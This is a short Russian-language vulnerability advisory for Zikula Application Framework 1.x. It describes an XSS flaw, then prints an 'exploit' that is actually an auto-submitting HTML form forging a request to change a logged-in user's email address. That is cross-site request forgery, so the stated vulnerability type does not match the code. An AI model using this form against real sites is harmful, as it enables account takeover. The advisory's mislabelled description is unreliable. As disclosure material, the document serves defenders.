Программа: Zikula Application Framework 1.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных при обработке HTTP запросов. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
<form method="POST" action="http://host/index.php?module=users&func=updateemail"
name="main">
<input type="hidden" name="newemail" value="test@test.com">
<input type="hidden" name="submit" value="">
</form>
<script>
document.main.submit();
</script>
